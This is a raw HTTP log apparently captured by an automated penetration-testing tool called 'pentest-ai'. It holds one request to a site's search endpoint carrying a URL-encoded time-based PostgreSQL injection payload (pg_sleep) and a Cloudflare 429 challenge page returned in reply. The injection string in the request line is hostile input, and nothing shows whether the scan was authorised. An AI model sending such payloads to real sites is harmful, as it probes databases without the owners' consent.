REQUEST:
GET https://my.myfirst.tech/search?id=1%27%20%7C%7C%20pg_sleep%285%29%7C%7C%27
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:14 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9368
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c8473e4b4ca110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=dcpHsCWqLU1JqFrjRzcnXZ1cagxpcNWyrAAUK%2F4POrcMS%2BFMomypavHFly6YL9FcGkexRmq0NOfUSeRuEHCLopQ%2BSf7KItYsMiQYBum2IB6%2FEW9BQKHrjOrvIsPjd%2F2Ww1iBhDd67iwe0zU2Yw%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c8473e4b4ca110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: '1o04ltjmHZmHEc6G4R_OQC4Z3ZNmzSej5Oy55UOb8SE-1784281154-1.2.1.1-Sb3QcsOk7r58GSbOjW1ZBkN0LGFF.MGaTexpV5unpDCWRK2UGusRzR4U3SorsR90',cITimeS: '1784281154',cRay: 'a1c8473e4b4ca110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/search?id=1%27+%7C%7C+pg_sleep%285%29%7C%7C%27\u0026__cf_chl_tk=EZPiFjuFAonLiULcM9N5QbzK9q4plB5gu8uwHyKdNrI-1784281154-1.0.1.1-61tQDXN1EuBO0uhfY22BM.FD6fLzdmNpK0iFiN4LArk",cvId: '3',cZone: 'my.myfirst.tech',fa:"/search?id=1%27+%7C%7C+pg_sleep%285%29%7C%7C%27\u0026__cf_chl_f_tk=EZPiFjuFAonLiULcM9N5QbzK9q4plB5gu8uwHyKdNrI-1784281154-1.0.1.1-61tQDXN1EuBO0uhfY22BM.FD6fLzdmNpK0iFiN4LArk",md: '.98a8Nh7S3nP3fB208Xnx5rKsOJVYNyu1Zvi5Ddcje0-1784281154-1.2.1.1-9pcpMK3M7pfeJqV.YzLAUwHnhB.a_nNW.Egu3_w7Y_JL7HkeVoSW0YH86ZwE8dsz_2wLf_jJfMLTEeeQtYNvuIUhCEpjfLcoit4ber.BM9QaPc8M03ZoE2SXC6aSRk32.qSLZ2bELVR2BB3o7ozHL0JjcKD.RzFLsxoXinONlDw1YC_TIqpvSDAwwUXHjphiJ7TiMA9ryvCOctJH1aSM6d4YqLVGLcU82Pg89MjQqjTCm7WTv5hi0Yx9cURejE1roSAiYofCD5BP2rwgjudzP6yUaBjEeNejskk7U1kyhq7HPxqb6qD00anp_mpmMBco_IOrsiA.g1bVzGbJ3gKMUEiHMFk_gmrjIs8LuB6rTt_UHN9hXQHLe8CR4bQJiNV..8dwS1AJuQQ2ZnedPUgimdYN0Pr4ZyuVMJ7efOQ34Cj_eQXpyiCW_kf7oV9CyzxiWKSdMXtLKd9K.wbh0fstL9DtidkP2dSw1Rb8j1IBKbK9TfRHsnhcDSgqymWl3J_kQVHPkkIHk7Ptj7Bgqvks4qf7QMDi5Jz5GCC3FjplDeRcZK0qBCnjGr8JyjR.nbcJQkcNPMpsgIJqca1G8v.PFqObocHCytrTmi4TuvkW98whY4bz0ECo1c6SPEvzxM6anFiSkVMoYW2gd7gA9aaYsOph.bF1HQHTDCcGKHnmzS_5ffjmwwwXR7ZJbYLV_QJx.fUPn9SZgkHGhHQor_wMdCg7o5fhPFERXiPWZBn6FJ_OWFZNsi79mb8Z.pjPCW9LzUuHVHXOe5qoVnCFFXg4x1zptIavcCETeZT01grZ4N9ZTtwlLl9z99lLLORlGoOLVbYnththxKL9kSN.hlES0ZHTg2g1JYgIL_T4bXPn83mH07a1mcPeP4CiK2lnjT60uIzR6kbyE2q5p2v2QIyC5AswsyMIzmu64Im1z4qmkof1mCPldTdm879R4PimDPiwLct.PBw_4jns3Hy8GEO5vqiWiTyAvccX2WKiROsbhKzxjUED5ksvDONmA67e.aYfP1Pu5jhKGFjW_FBXtJd6j5bsDzFdRBk1uvlwZF5RkTxLK70VBvw5YHqcZlwprO9LXEQyRbT7tLlafylw3xmNk9LuqADWmbGTwTwofPSgmQTXFS2C7ZaXeWyR4DYeQicn3TvEPYYudEt2ztZKUM5S5_XNnr2h_pc5Hrk_.OkZN5ESCIzQXT6bSCegicXtx8Wr',mdrd: 'rBbkz3fulGEPm.DCkgF_tFh9zfiN4EdH9JlUTMrStus-1784281154-1.2.1.1-j9IlfEJ7T0YWZkmMn6yhSu17doLHnUkHjNWBLpULJPBK.S0pO.kDfc.S7n8T02gAP8mI2ZO2pSXsr63qFpw3ykNJDDSOPu1scME99.8ZfLMmxf1EKSAg1PZzbjt_VUQli_PaY_kiP7BdqfpcKE5odR5BzbCKPCuuj0TIuCbsP9emFyexCfOhY8ofAmHaZtAY1tKST8Regotc7ZhbJL2wLA5G7H1x5PvEez7Xz.NzqqiGI88C0CJGKM3YYRKuKgqj',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c8473e4b4ca110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/search?id=1%27+%7C%7C+pg_sleep%285%29%7C%7C%27\u0026__cf_chl_rt_tk=EZPiFjuFAonLiULcM9N5QbzK9q4plB5gu8uwHyKdNrI-1784281154-1.0.1.1-61tQDXN1EuBO0uhfY22BM.FD6fLzdmNpK0iFiN4LArk"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
